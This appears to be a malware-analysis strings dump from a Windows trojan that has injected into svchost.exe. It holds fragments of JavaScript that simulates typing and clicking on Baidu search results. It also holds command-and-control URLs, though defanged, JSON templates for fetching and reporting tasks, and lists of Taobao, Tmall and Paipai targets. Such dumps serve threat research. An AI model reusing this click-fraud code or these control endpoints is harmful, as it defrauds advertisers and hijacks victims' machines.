User32.DLL
User32.DLL
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Referer: hXXp://VVV.baidu.com/s
Referer: hXXp://VVV.baidu.com/s
Content-Type:application/x-www-form-urlencoded;
Content-Type:application/x-www-form-urlencoded;
GetData.asp
GetData.asp
SetData.asp
SetData.asp
0.0.0.0
0.0.0.0
VVV.baidu.com/s?
VVV.baidu.com/s?
window.alert = null;window.confirm = null;window.open = null;window.showModalDialog = null;
window.alert = null;window.confirm = null;window.open = null;window.showModalDialog = null;
hXXp://VVV.baidu.com/s?wd=
hXXp://VVV.baidu.com/s?wd=
url=url.toLowerCase();
url=url.toLowerCase();
hXXp://VVV.baidu.com/
hXXp://VVV.baidu.com/
VVV.baidu.com
VVV.baidu.com
hXXp://1.rwdns.com/zztj/yeshe.html
hXXp://1.rwdns.com/zztj/yeshe.html
hXXp://1.rwdns.com/
hXXp://1.rwdns.com/
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
%s.dll
%s.dll
CCmdTarget
CCmdTarget
COMCTL32.DLL
COMCTL32.DLL
hhctrl.ocx
hhctrl.ocx
commctrl_DragListMsg
commctrl_DragListMsg
CNotSupportedException
CNotSupportedException
CHttpConnection
CHttpConnection
CHttpFile
CHttpFile
hXXp://
hXXp://
WININET.DLL
WININET.DLL
HTTP/1.0
HTTP/1.0
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
user32.dll
user32.dll
ole32.dll
ole32.dll
mscoree.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
Please contact the application's support team for more information.
GetProcessWindowStation
GetProcessWindowStation
OLEACC.dll
OLEACC.dll
c:\Documents and Settings\Administrator\
c:\Documents and Settings\Administrator\
\Suphit\Suphit6_Client\Client\Release\Client.pdb
\Suphit\Suphit6_Client\Client\Release\Client.pdb
SHELL32.dll
SHELL32.dll
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCException@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCObject@@
.PAVCObject@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCFileException@@
.PAVCFileException@@
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
GetCPInfo
GetCPInfo
RegOpenKeyExA
RegOpenKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
GetViewportExtEx
GetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
UrlUnescapeA
UrlUnescapeA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
HttpOpenRequestA
HttpOpenRequestA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
zwsp.fQ
zwsp.fQ
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll
WINSPOOL.DRV
WINSPOOL.DRV
WS2_32.dll
WS2_32.dll
var rnd = 500 parseInt(2000*Math.random());
var rnd = 500 parseInt(2000*Math.random());
if (el.value==kw){return true} else{return false}
if (el.value==kw){return true} else{return false}
el.click && el.click();
el.click && el.click();
var el = document.getElementById('su1') ? document.getElementById('su1') : document.getElementById('su');
var el = document.getElementById('su1') ? document.getElementById('su1') : document.getElementById('su');
i = 1 rnd; if (i>kw.length){i=kw.length};
i = 1 rnd; if (i>kw.length){i=kw.length};
var rnd = parseInt(2*Math.random());
var rnd = parseInt(2*Math.random());
if(i
if(i
var kwNode = kw.substring(0,i);
var kwNode = kw.substring(0,i);
el.value=kw;
el.value=kw;
el.focus();
el.focus();
el.value='';
el.value='';
var el = document.getElementById('kw1') ? document.getElementById('kw1') : document.getElementById('kw');
var el = document.getElementById('kw1') ? document.getElementById('kw1') : document.getElementById('kw');
el.fireEvent('onkeyup');
el.fireEvent('onkeyup');
el.fireEvent('onkeydown');
el.fireEvent('onkeydown');
} else if (el.fireEvent) {
} else if (el.fireEvent) {
el.dispatchEvent(evt);
el.dispatchEvent(evt);
evt.initMouseEvent('keydown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt.initMouseEvent('keydown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt = document.createEvent('KeyEvents');
evt = document.createEvent('KeyEvents');
if (document.createEvent) {
if (document.createEvent) {
node.click && node.click();
node.click && node.click();
if (node.innerHTML == '
if (node.innerHTML == '
var length = allNodes.length;
var length = allNodes.length;
var allNodes = document.getElementsByTagName('a');
var allNodes = document.getElementsByTagName('a');
if(ESubmit.value == '
if(ESubmit.value == '
'){ESubmit.value = 'false';}
'){ESubmit.value = 'false';}
ESubmit.value = 'ok';
ESubmit.value = 'ok';
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,false);
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,false);
if (5*Math.random()
if (5*Math.random()
if (g_url==url){
if (g_url==url){
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,OpenSite);
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,OpenSite);
ESubmit.value = IntPaimin.toString();
ESubmit.value = IntPaimin.toString();
if (g_url==url.substring(1,21) '...'){
if (g_url==url.substring(1,21) '...'){
if ((g_url!=null) && (g_url.length==24) && (g_url.substring(22,3)=='...')){
if ((g_url!=null) && (g_url.length==24) && (g_url.substring(22,3)=='...')){
var g_url = GetUrl(g);
var g_url = GetUrl(g);
var g = content_left.childNodes.item(i).getElementsByTagName('span');
var g = content_left.childNodes.item(i).getElementsByTagName('span');
var t_a = t.item(0).getElementsByTagName('a');
var t_a = t.item(0).getElementsByTagName('a');
if (!t.item(0)) {continue;}
if (!t.item(0)) {continue;}
var t = content_left.childNodes.item(i).getElementsByTagName('h3');
var t = content_left.childNodes.item(i).getElementsByTagName('h3');
if ((content_left.childNodes.item(i).tagName.toLowerCase()!='div')||(content_left.childNodes.item(i).className.toLowerCase().indexOf('c-container')==-1)) {continue;}
if ((content_left.childNodes.item(i).tagName.toLowerCase()!='div')||(content_left.childNodes.item(i).className.toLowerCase().indexOf('c-container')==-1)) {continue;}
for (var i=0;i
for (var i=0;i
var content_left = document.getElementById('content_left');
var content_left = document.getElementById('content_left');
var url='
var url='
var result = re.exec(g_a);
var result = re.exec(g_a);
g_a=g_a.replace('','');
g_a=g_a.replace('','');
g_a=g_a.replace('','');
g_a=g_a.replace('','');
g_a=g.item(j).innerHTML.toLowerCase();
g_a=g.item(j).innerHTML.toLowerCase();
if((g.item(j).className.toLowerCase()=='g'||g.item(j).className.toLowerCase()=='c-showurl')&&g.item(j).id==''){
if((g.item(j).className.toLowerCase()=='g'||g.item(j).className.toLowerCase()=='c-showurl')&&g.item(j).id==''){
for (var j=0;j
for (var j=0;j
function GetUrl(g){
function GetUrl(g){
if(!ckst){ESubmit.value = 'false';}
if(!ckst){ESubmit.value = 'false';}
ckst = el.fireEvent('onmousedown',event);
ckst = el.fireEvent('onmousedown',event);
var event = document.createEventObject();
var event = document.createEventObject();
if(Open){el.click && el.click();}
if(Open){el.click && el.click();}
ckst = el.dispatchEvent(evt);
ckst = el.dispatchEvent(evt);
evt.initMouseEvent('mousedown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt.initMouseEvent('mousedown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt = document.createEvent('MouseEvents');
evt = document.createEvent('MouseEvents');
var ESubmit = document.getElementById('su')?document.getElementById('su'):document.getElementById('su1');
var ESubmit = document.getElementById('su')?document.getElementById('su'):document.getElementById('su1');
accKeyboardShortcut
accKeyboardShortcut
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
Access to %1 was denied..An invalid file handle was associated with %1.
Access to %1 was denied..An invalid file handle was associated with %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
1.0.0.1
1.0.0.1
Client.exe
Client.exe
svchost.exe_232_rwx_00400000_0004F000:
`.rsrc
`.rsrc
FtPh
FtPh
t.Ht4
t.Ht4
Winmm.dll
Winmm.dll
DSound.dll
DSound.dll
User32.DLL
User32.DLL
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Referer: hXXp://VVV.baidu.com/s
Referer: hXXp://VVV.baidu.com/s
Content-Type:application/x-www-form-urlencoded;
Content-Type:application/x-www-form-urlencoded;
GetData.asp
GetData.asp
SetData.asp
SetData.asp
0.0.0.0
0.0.0.0
VVV.baidu.com/s?
VVV.baidu.com/s?
window.alert = null;window.confirm = null;window.open = null;window.showModalDialog = null;
window.alert = null;window.confirm = null;window.open = null;window.showModalDialog = null;
hXXp://VVV.baidu.com/s?wd=
hXXp://VVV.baidu.com/s?wd=
url=url.toLowerCase();
url=url.toLowerCase();
hXXp://VVV.baidu.com/
hXXp://VVV.baidu.com/
VVV.baidu.com
VVV.baidu.com
hXXp://1.rwdns.com/zztj/yeshe.html
hXXp://1.rwdns.com/zztj/yeshe.html
hXXp://1.rwdns.com/
hXXp://1.rwdns.com/
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
%s.dll
%s.dll
CCmdTarget
CCmdTarget
COMCTL32.DLL
COMCTL32.DLL
hhctrl.ocx
hhctrl.ocx
commctrl_DragListMsg
commctrl_DragListMsg
CNotSupportedException
CNotSupportedException
CHttpConnection
CHttpConnection
CHttpFile
CHttpFile
hXXp://
hXXp://
WININET.DLL
WININET.DLL
HTTP/1.0
HTTP/1.0
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
user32.dll
user32.dll
ole32.dll
ole32.dll
mscoree.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
Please contact the application's support team for more information.
GetProcessWindowStation
GetProcessWindowStation
OLEACC.dll
OLEACC.dll
c:\Documents and Settings\Administrator\
c:\Documents and Settings\Administrator\
\Suphit\Suphit6_Client\Client\Release\Client.pdb
\Suphit\Suphit6_Client\Client\Release\Client.pdb
SHELL32.dll
SHELL32.dll
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCException@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCObject@@
.PAVCObject@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCFileException@@
.PAVCFileException@@
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
GetCPInfo
GetCPInfo
RegOpenKeyExA
RegOpenKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
GetViewportExtEx
GetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
UrlUnescapeA
UrlUnescapeA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
HttpOpenRequestA
HttpOpenRequestA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
zwsp.fQ
zwsp.fQ
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll
WINSPOOL.DRV
WINSPOOL.DRV
WS2_32.dll
WS2_32.dll
var rnd = 500 parseInt(2000*Math.random());
var rnd = 500 parseInt(2000*Math.random());
if (el.value==kw){return true} else{return false}
if (el.value==kw){return true} else{return false}
el.click && el.click();
el.click && el.click();
var el = document.getElementById('su1') ? document.getElementById('su1') : document.getElementById('su');
var el = document.getElementById('su1') ? document.getElementById('su1') : document.getElementById('su');
i = 1 rnd; if (i>kw.length){i=kw.length};
i = 1 rnd; if (i>kw.length){i=kw.length};
var rnd = parseInt(2*Math.random());
var rnd = parseInt(2*Math.random());
if(i
if(i
var kwNode = kw.substring(0,i);
var kwNode = kw.substring(0,i);
el.value=kw;
el.value=kw;
el.focus();
el.focus();
el.value='';
el.value='';
var el = document.getElementById('kw1') ? document.getElementById('kw1') : document.getElementById('kw');
var el = document.getElementById('kw1') ? document.getElementById('kw1') : document.getElementById('kw');
el.fireEvent('onkeyup');
el.fireEvent('onkeyup');
el.fireEvent('onkeydown');
el.fireEvent('onkeydown');
} else if (el.fireEvent) {
} else if (el.fireEvent) {
el.dispatchEvent(evt);
el.dispatchEvent(evt);
evt.initMouseEvent('keydown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt.initMouseEvent('keydown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt = document.createEvent('KeyEvents');
evt = document.createEvent('KeyEvents');
if (document.createEvent) {
if (document.createEvent) {
node.click && node.click();
node.click && node.click();
if (node.innerHTML == '
if (node.innerHTML == '
var length = allNodes.length;
var length = allNodes.length;
var allNodes = document.getElementsByTagName('a');
var allNodes = document.getElementsByTagName('a');
if(ESubmit.value == '
if(ESubmit.value == '
'){ESubmit.value = 'false';}
'){ESubmit.value = 'false';}
ESubmit.value = 'ok';
ESubmit.value = 'ok';
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,false);
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,false);
if (5*Math.random()
if (5*Math.random()
if (g_url==url){
if (g_url==url){
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,OpenSite);
var cknode=GetChildN(t_a.item(0));simulateClick(cknode,OpenSite);
ESubmit.value = IntPaimin.toString();
ESubmit.value = IntPaimin.toString();
if (g_url==url.substring(1,21) '...'){
if (g_url==url.substring(1,21) '...'){
if ((g_url!=null) && (g_url.length==24) && (g_url.substring(22,3)=='...')){
if ((g_url!=null) && (g_url.length==24) && (g_url.substring(22,3)=='...')){
var g_url = GetUrl(g);
var g_url = GetUrl(g);
var g = content_left.childNodes.item(i).getElementsByTagName('span');
var g = content_left.childNodes.item(i).getElementsByTagName('span');
var t_a = t.item(0).getElementsByTagName('a');
var t_a = t.item(0).getElementsByTagName('a');
if (!t.item(0)) {continue;}
if (!t.item(0)) {continue;}
var t = content_left.childNodes.item(i).getElementsByTagName('h3');
var t = content_left.childNodes.item(i).getElementsByTagName('h3');
if ((content_left.childNodes.item(i).tagName.toLowerCase()!='div')||(content_left.childNodes.item(i).className.toLowerCase().indexOf('c-container')==-1)) {continue;}
if ((content_left.childNodes.item(i).tagName.toLowerCase()!='div')||(content_left.childNodes.item(i).className.toLowerCase().indexOf('c-container')==-1)) {continue;}
for (var i=0;i
for (var i=0;i
var content_left = document.getElementById('content_left');
var content_left = document.getElementById('content_left');
var url='
var url='
var result = re.exec(g_a);
var result = re.exec(g_a);
g_a=g_a.replace('','');
g_a=g_a.replace('','');
g_a=g_a.replace('','');
g_a=g_a.replace('','');
g_a=g.item(j).innerHTML.toLowerCase();
g_a=g.item(j).innerHTML.toLowerCase();
if((g.item(j).className.toLowerCase()=='g'||g.item(j).className.toLowerCase()=='c-showurl')&&g.item(j).id==''){
if((g.item(j).className.toLowerCase()=='g'||g.item(j).className.toLowerCase()=='c-showurl')&&g.item(j).id==''){
for (var j=0;j
for (var j=0;j
function GetUrl(g){
function GetUrl(g){
if(!ckst){ESubmit.value = 'false';}
if(!ckst){ESubmit.value = 'false';}
ckst = el.fireEvent('onmousedown',event);
ckst = el.fireEvent('onmousedown',event);
var event = document.createEventObject();
var event = document.createEventObject();
if(Open){el.click && el.click();}
if(Open){el.click && el.click();}
ckst = el.dispatchEvent(evt);
ckst = el.dispatchEvent(evt);
evt.initMouseEvent('mousedown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt.initMouseEvent('mousedown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
evt = document.createEvent('MouseEvents');
evt = document.createEvent('MouseEvents');
var ESubmit = document.getElementById('su')?document.getElementById('su'):document.getElementById('su1');
var ESubmit = document.getElementById('su')?document.getElementById('su'):document.getElementById('su1');
accKeyboardShortcut
accKeyboardShortcut
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
Access to %1 was denied..An invalid file handle was associated with %1.
Access to %1 was denied..An invalid file handle was associated with %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
1.0.0.1
1.0.0.1
Client.exe
Client.exe
svchost.exe_992:
`.rsrc
`.rsrc
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
ADVAPI32.dll
ADVAPI32.dll
S2_32.dll
S2_32.dll
le32.dll
le32.dll
flow_apikey_xh
flow_apikey_xh
chrome.exe
chrome.exe
hXXp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
hXXp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx
{"exec":"getflows","execCount":"8","userid":"%s","userip":"%s"}
{"exec":"getflows","execCount":"8","userid":"%s","userip":"%s"}
parems=%s
parems=%s
task_url":"
task_url":"
{"data":[%s],"code":"%s","src":"%s","datefirst":"%s","exec":"taskcomplete","userid":"%s","version":"%s"}
{"data":[%s],"code":"%s","src":"%s","datefirst":"%s","exec":"taskcomplete","userid":"%s","version":"%s"}
\chrome.exe
\chrome.exe
dwError: %d
dwError: %d
%s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}
%s%s -URL{%s} -REF{%s} -NAV{%d} -STY{%d} -PXY{%s}
{"task_id":"%s","task_o_id":"%s","task_result":"%s","user_ip":"%s"}
{"task_id":"%s","task_o_id":"%s","task_result":"%s","user_ip":"%s"}
hXXp://VVV.ip138.com
hXXp://VVV.ip138.com
.tmall.com
.tmall.com
.taobao.com
.taobao.com
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; EmbeddedWB 14.52 from: hXXp://VVV.bsalsa.com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Alexa Toolbar)
{"userip":"%s","code":"%s","src":"%s","datefirst":"%s","exec":"transfer_clients","userid":"%s"}
{"userip":"%s","code":"%s","src":"%s","datefirst":"%s","exec":"transfer_clients","userid":"%s"}
\\.\PhysicalDrive0
\\.\PhysicalDrive0
iphlpapi.dll
iphlpapi.dll
hXXp://wangbao.6299.cc/xc.txt
hXXp://wangbao.6299.cc/xc.txt
sdfadfwefawCOverbearingWebAppefaefaf
sdfadfwefawCOverbearingWebAppefaefaf
CWebBrowser2
CWebBrowser2
::WriteFile failed ("%s").
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The file (%s) aleady exists.
The encoded URL is not valid.
The encoded URL is not valid.
The port number is not valid.
The port number is not valid.
The requested URL is not a valid URL.
The requested URL is not a valid URL.
HTTP/1.1
HTTP/1.1
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
hXXps://
hXXps://
hXXp://
hXXp://
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
error:%d
error:%d
Mdd
Mdd
Host: %s
Host: %s
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
H SSh
H SSh
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
urlmon.dll
urlmon.dll
MSVCP60.dll
MSVCP60.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
VERSION.dll
VERSION.dll
IMAGEHLP.dll
IMAGEHLP.dll
TbViewer.exe
TbViewer.exe
hXXp://auction1.paipai.com/
hXXp://auction1.paipai.com/
.paipai.com
.paipai.com
hXXp://detail.tmall.com/item.htm?
hXXp://detail.tmall.com/item.htm?
hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?
hXXp://ju.mmstat.com/?url=hXXp://item.taobao.com/item.htm?
hXXp://item.taobao.com/item.htm?
hXXp://item.taobao.com/item.htm?
%d/%d
%d/%d
TbViewer.Document
TbViewer.Document
hXXp://search1.paipai.com/cgi-bin/comm_search1?KeyWord={KEYWORD}&sDefKeyword=&sClassid=0&shoptype=&searchType=0&PTAG=20084.2.2&as=1
hXXp://search1.paipai.com/cgi-bin/comm_search1?KeyWord={KEYWORD}&sDefKeyword=&sClassid=0&shoptype=&searchType=0&PTAG=20084.2.2&as=1
hXXp://s.1688.com/selloffer/offer_search.htm?keywords={KEYWORD}&n=y&categoryId=
hXXp://s.1688.com/selloffer/offer_search.htm?keywords={KEYWORD}&n=y&categoryId=
.1688.com
.1688.com
hXXp://s.taobao.com/search?q={KEYWORD}&commend=all&ssid=s5-e&search_type=item&sourceId=tb.index&initiative_id=tbindexz_{YMD}
